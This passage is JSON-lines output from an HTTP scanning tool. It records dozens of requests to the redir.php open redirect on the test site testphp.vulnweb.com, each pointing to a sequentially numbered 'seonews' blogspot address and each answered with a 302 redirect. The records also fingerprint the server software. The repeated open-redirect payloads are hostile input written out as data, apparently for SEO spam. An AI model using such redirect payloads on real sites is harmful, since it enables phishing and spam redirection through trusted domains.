management.html\",\"location\":\"http://seonews1708.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1708.blogspot.com/management.html\",\"time\":\"345.994388ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.885559979Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1709.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1709.blogspot.com/\",\"location\":\"http://seonews1709.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1709.blogspot.com/\",\"time\":\"344.461012ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:37.972957337Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1710.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1710.blogspot.com/\",\"location\":\"http://seonews1710.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1710.blogspot.com/\",\"time\":\"355.382022ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:38.064677552Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1710.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1710.blogspot.com/management.html\",\"location\":\"http://seonews1710.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1710.blogspot.com/management.html\",\"time\":\"344.248296ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:38.12307658Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1711.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1711.blogspot.com/\",\"location\":\"http://seonews1711.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1711.blogspot.com/\",\"time\":\"344.632745ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:38.22722205Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1711.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1711.blogspot.com/management.html\",\"location\":\"http://seonews1711.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1711.blogspot.com/management.html\",\"time\":\"347.5934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:41.380575712Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1712.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1712.blogspot.com/management.html\",\"location\":\"http://seonews1712.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1712.blogspot.com/management.html\",\"time\":\"347.215259ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:41.606186507Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1713.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1713.blogspot.com/\",\"location\":\"http://seonews1713.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1713.blogspot.com/\",\"time\":\"348.556779ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:41.633781203Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1713.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1713.blogspot.com/management.html\",\"location\":\"http://seonews1713.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1713.blogspot.com/management.html\",\"time\":\"348.103168ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:41.68327715Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1714.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1714.blogspot.com/management.html\",\"location\":\"http://seonews1714.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1714.blogspot.com/management.html\",\"time\":\"348.985369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:42.103466532Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1715.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1715.blogspot.com/\",\"location\":\"http://seonews1715.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1715.blogspot.com/\",\"time\":\"348.958738ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:42.502066289Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1716.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1716.blogspot.com/\",\"location\":\"http://seonews1716.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1716.blogspot.com/\",\"time\":\"355.00456ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:42.540832119Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1716.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1716.blogspot.com/management.html\",\"location\":\"http://seonews1716.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1716.blogspot.com/management.html\",\"time\":\"357.339085ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:42.75024278Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1717.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1717.blogspot.com/management.html\",\"location\":\"http://seonews1717.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1717.blogspot.com/management.html\",\"time\":\"347.056403ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:43.246183663Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1719.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1719.blogspot.com/\",\"location\":\"http://seonews1719.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1719.blogspot.com/\",\"time\":\"351.838388ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:43.305010967Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1719.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1719.blogspot.com/management.html\",\"location\":\"http://seonews1719.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1719.blogspot.com/management.html\",\"time\":\"352.854869ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:45.017100141Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1720.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1720.blogspot.com/\",\"location\":\"http://seonews1720.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1720.blogspot.com/\",\"time\":\"354.683684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:46.281806261Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1720.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1720.blogspot.com/management.html\",\"location\":\"http://seonews1720.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1720.blogspot.com/management.html\",\"time\":\"351.901522ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:46.315109229Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1721.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1721.blogspot.com/\",\"location\":\"http://seonews1721.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1721.blogspot.com/\",\"time\":\"348.016941ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:46.654077752Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1722.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1722.blogspot.com/management.html\",\"location\":\"http://seonews1722.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1722.blogspot.com/management.html\",\"time\":\"339.73068ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.503438892Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1723.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1723.blogspot.com/management.html\",\"location\":\"http://seonews1723.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1723.blogspot.com/management.html\",\"time\":\"351.055841ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.542445567Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1725.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1725.blogspot.com/management.html\",\"location\":\"http://seonews1725.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1725.blogspot.com/management.html\",\"time\":\"356.268237ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.564376097Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1726.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1726.blogspot.com/\",\"location\":\"http://seonews1726.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1726.blogspot.com/\",\"time\":\"352.036974ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.580903583Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1728.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1728.blogspot.com/management.html\",\"location\":\"http://seonews1728.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1728.blogspot.com/management.html\",\"time\":\"357.095459ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.916540581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1729.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1729.blogspot.com/\",\"location\":\"http://seonews1729.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1729.blogspot.com/\",\"time\":\"348.497314ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.924785826Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1729.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1729.blogspot.com/management.html\",\"location\":\"http://seonews1729.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1729.blogspot.com/management.html\",\"time\":\"355.837404ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:47.997451823Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1730.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1730.blogspot.com/\",\"location\":\"http://seonews1730.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1730.blogspot.com/\",\"time\":\"348.113896ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.029517031Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1730.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1730.blogspot.com/management.html\",\"location\":\"http://seonews1730.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1730.blogspot.com/management.html\",\"time\":\"356.18143ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.064121856Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1731.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1731.blogspot.com/\",\"location\":\"http://seonews1731.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1731.blogspot.com/\",\"time\":\"351.649095ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.161542755Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1733.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1733.blogspot.com/\",\"location\":\"http://seonews1733.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1733.blogspot.com/\",\"time\":\"348.53431ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.220270585Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1733.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1733.blogspot.com/management.html\",\"location\":\"http://seonews1733.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1733.blogspot.com/management.html\",\"time\":\"361.646575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.236766294Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1734.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1734.blogspot.com/management.html\",\"location\":\"http://seonews1734.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1734.blogspot.com/management.html\",\"time\":\"348.959432ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.318622766Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1736.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1736.blogspot.com/management.html\",\"location\":\"http://seonews1736.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1736.blogspot.com/management.html\",\"time\":\"344.065648ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.40942735Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1737.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1737.blogspot.com/\",\"location\":\"http://seonews1737.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1737.blogspot.com/\",\"time\":\"342.731147ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.481731845Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1737.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1737.blogspot.com/management.html\",\"location\":\"http://seonews1737.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1737.blogspot.com/management.html\",\"time\":\"356.514066ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:48.575870944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1738.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1738.blogspot.com/\",\"location\":\"http://seonews1738.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1738.blogspot.com/\",\"time\":\"346.498397ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:51.727819938Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1738.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1738.blogspot.com/management.html\",\"location\":\"http://seonews1738.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1738.blogspot.com/management.html\",\"time\":\"344.089469ms\",\"a\":[\"44.228.249.3\"],\"tech\":[